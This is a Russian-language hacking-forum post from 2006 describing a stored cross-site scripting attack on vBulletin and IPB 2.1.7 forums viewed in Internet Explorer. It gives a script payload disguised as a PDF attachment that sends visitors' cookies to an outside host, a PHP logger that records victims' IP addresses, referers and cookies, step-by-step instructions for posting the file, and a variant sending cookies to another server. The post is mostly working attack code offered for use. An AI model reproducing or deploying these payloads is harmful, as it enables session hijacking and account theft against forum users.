XSS vbulletin and IPB v2.1.7 With IE

XSS vbulletin and IPB v2.1.7 With IE

06.08.2006, 10:42

liauliau

Новичок

Регистрация: 09.04.2005

Сообщений: 29

С нами: 11099185

Репутация: 17

XSS vbulletin and IPB v2.1.7 With IE

XSS vbulletin and IPB v2.1.7 With IE

test:<html><script> alert("hello");</script></html>

-----------------------------------------------------------------

test.pdf
------

Код:

<html><script>img = new Image(); img.src = "http://blablabla.org/c.php?c="+document.cookie;</script></html>

c.php
-----

Код:

<?php 
 $cookie = $_GET['c']; 
 $ip = getenv ('REMOTE_ADDR'); 
 $date=date("m/d/Y g:i:s a"); 
 $referer= getenv ('HTTP_REFERER'); 
 $fl = fopen('log.txt', 'a'); 
 fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer."\n".$cookie."\n"); 
 fclose($fl); 
?>

1_ Пишут test.pdf и c.php
2_ Помещенный c.php на webserver.
3_ Изменяют(Заменяют) url в test.pdf.
4_ Делают пост с test.pdf как attachement.
5_, когда кто - то будет смотреть на ваш attachement, Вы получите его печенье в log.txt

Лог сниффера

Код:

<html>
<script>img = new Image(); img.src ="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
</html>

𝕏 Twitter Reddit Telegram Копировать ссылку

Последний раз редактировалось liauliau; 06.08.2006 в 10:48..

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

Создать сделку

Мои сделки

Сделка